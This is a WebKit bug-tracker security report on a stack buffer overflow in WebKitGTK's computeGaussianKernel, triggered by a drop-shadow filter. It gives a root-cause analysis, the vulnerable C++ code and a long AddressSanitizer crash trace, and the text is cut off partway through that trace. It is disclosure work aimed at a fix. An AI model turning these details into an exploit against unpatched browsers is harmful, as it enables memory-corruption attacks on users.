Bug 265659

Summary:

[TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability for drop-shadow filter

Product:

Security

Reporter:

Park Sangwoo <pswpsw0177>

Component:

Security

Assignee:

Jonathan Bedard <jbedard>

Status:

RESOLVED FIXED

Severity:

Normal

CC:

bfulgham, cgarcia, don.olmstead, fujii, magomez, mcatanzaro, webkit-bug-importer

Priority:

Keywords:

Gtk, InRadar

Version:

WebKit Local Build

Hardware:

OS:

Linux

Attachments:

Description	Flags
PoC file	none
WIP patch	none
test case 2	none
Patch	none

Park Sangwoo

Reported 2023-12-01 05:29:27 PST

Created attachment 468832 [details] PoC file 1. Vulnerability Title a. WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability 2. High-level overview of the vulnerability and the possible effect of using it 1. The Stack Buffer Overflow Vulnerability exists in WebKit GTK computeGaussianKernel function. 2. An Attacker must open a arbitrary generated HTML file to exploit this vulnerability. 3. Exact product that was found to be vulnerable including complete version information 1. Ubuntu 22.04.3 LTS 4. Root Cause Analysis (recommended but not required) 1. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel` . 2. Refer to the `radius` in the function `computeGaussianKernel`. This causes Stack Buffer Overflow. 3. The lack of size validation for radius leads to a stack buffer overflow. ```cpp static unsigned blurRadiusToKernelHalfSize(float radius) { return ceilf(radius * 2 + 1); } static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset) { unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius); ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize); float fullKernel[GaussianKernelMaxHalfSize]; fullKernel[0] = 1; float sum = fullKernel[0]; for (unsigned i = 1; i < kernelHalfSize; ++i) { fullKernel[i] = gauss(i, radius); //====> crash here sum += 2 * fullKernel[i]; } float scale = 1 / sum; for (unsigned i = 0; i < kernelHalfSize; ++i) fullKernel[i] *= scale; unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize); kernel[0] = fullKernel[0]; for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) { unsigned offset1 = 2 * i - 1; unsigned offset2 = 2 * i; if (offset2 >= kernelHalfSize) { kernel[i] = fullKernel[offset1]; offset[i] = offset1; break; } kernel[i] = fullKernel[offset1] + fullKernel[offset2]; offset[i] = (fullKernel[offset1] * offset1 + fullKernel[offset2] * offset2) / kernel[i]; } return simplifiedKernelHalfSize; } ``` ```cpp ================================================================= ==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88 WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor) #0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 #1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36 #2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13 #3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16 #4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28 #5 0x7f4c093aef34 in WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40 #6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9 #7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17 #8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9 #9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #31 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5 #39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23 #40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14 #41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68 #42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35 #44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5 #45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14 #46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14 #47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11 #48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17 #49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35 #51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33 #52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16 #53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43 #54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28 #55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5 #56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #57 0x7f4bfcb76257 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9 #60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9 #61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39 #62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35 #63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5 #64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5 #65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8 #66 0x7f4bfc526a3f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81 Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame #0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856 This frame has 6 object(s): [32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable [112, 120) 'program' (line 857) [144, 168) 'kernel' (line 870) [208, 232) 'offset' (line 871) [272, 400) 'textureBlurMatrix' (line 877) [432, 560) 'ref.tmp53' (line 895) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) Thread T9 (eadedCompositor) created by T0 here: #0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984) #1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17 #2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32 #3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5 #4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17 #5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34 #6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12 #7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28 #8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26 #9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20 #10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34 #11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12 #12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27 #13 0x7f4c0925afda in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5 #14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24 #15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31 #16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21 #17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13 #18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14 #19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14 #20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, 